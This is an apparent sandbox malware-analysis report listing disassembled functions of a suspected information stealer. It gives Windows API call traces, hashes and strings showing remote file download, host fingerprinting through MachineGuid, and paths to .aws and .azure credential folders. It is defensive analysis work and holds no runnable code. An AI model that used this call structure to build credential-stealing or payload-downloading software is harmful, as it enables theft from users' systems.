Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 2120869262-2697854757
Opcode ID: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
Instruction ID: 1d26c69091b310833a01da009a7ea8e67b8bedb29d0866ac6f751b535dc35178
Opcode Fuzzy Hash: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
Instruction Fuzzy Hash: 70E19171D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6

Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00404DCF

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
StrCmpCA.SHLWAPI(?), ref: 00404E38
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
InternetCloseHandle.WININET(00000000), ref: 00404EE9
InternetCloseHandle.WININET(?), ref: 00404EF2

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2737972104-0
Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5

Function 00410415 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041043B
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
CharToOemA.USER32(?,?), ref: 00410493

Strings

MachineGuid, xrefs: 0041046E
SOFTWARE\Microsoft\Cryptography, xrefs: 0041044D
NeB, xrefs: 00410443, 0041047C, 00410473, 00410446

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$NeB$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1973151993
Opcode ID: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
Instruction ID: e049fcdf3dccc2042a1c1aa5727c33f1d227b0b17948d6a14ccc4f9ac1de0051
Opcode Fuzzy Hash: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
Instruction Fuzzy Hash: 8A014F7590421DFFEB10DB90DC89FEAB77CEB18708F5000A5B644E2051EAB45FC88B60

Function 0041695F Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 654networkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416964

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502

Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

Part of subcall function 00417645: GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,004265BB,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E

Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56

Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581

Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A

Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5

Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213

Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882

Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB

Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F

Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
Part of subcall function 00416791: memset.MSVCRT ref: 00416834
Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
Part of subcall function 00416791: memset.MSVCRT ref: 004168B7

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

5A&6A, xrefs: 00416ABD, 00416B04, 00416B0A

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
String ID: 5A&6A
API String ID: 1955031769-2983527881
Opcode ID: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
Instruction ID: edbb1815c7422c7d311f49e837a4d97797ab122b1f4c92a9abc43992aef21044
Opcode Fuzzy Hash: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
Instruction Fuzzy Hash: 8C4242B1D00358AADF10EBE5C946BDEBB78AF15304F5041AEF54573281DB781B888BA7

Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406190
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
String ID:
API String ID: 3869837436-0
Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64

Function 0040FF81 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
HeapAlloc.KERNEL32(00000000), ref: 0040FF96
GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
wsprintfA.USER32 ref: 0040FFDC

Strings

%d MB, xrefs: 0040FFD6
@, xrefs: 0040FFAF

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
Instruction ID: ca080bb329355c7b2013afa2bdf3b2efff8528aa9c5ce76f1778211d5c0869c6
Opcode Fuzzy Hash: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
Instruction Fuzzy Hash: 8AF036B5A00218ABE7149BA4DC4AF7E76BEEB45705F400039F702E61C0D7B4D8058769

Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

CloseHandle.KERNEL32(00000000), ref: 004172D5
Sleep.KERNEL32(00001B58), ref: 004172E0
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265C7), ref: 004172F1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
CloseHandle.KERNEL32(00000000), ref: 00417315
ExitProcess.KERNEL32 ref: 0041731C

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
String ID:
API String ID: 1043047581-0
Opcode ID: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
Instruction ID: d94f923eae08acc0ec9c25e643b9a8e0192b3615959a138ccc40586fc2a64efe
Opcode Fuzzy Hash: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
Instruction Fuzzy Hash: 38113D71900019BBCB11FBE2DD6ADEEB77DAE55304B50007EF502B24E1DF386A09CA69

Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00403A59
??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
??_U@YAPAXI@Z.MSVCRT ref: 00403A94
??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackH_prologInternetlstrlen
String ID:
API String ID: 503950642-0
Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54

Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004064EA

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065A7

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 0040661F
LoadLibraryA.KERNEL32(00000000), ref: 0040663A

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
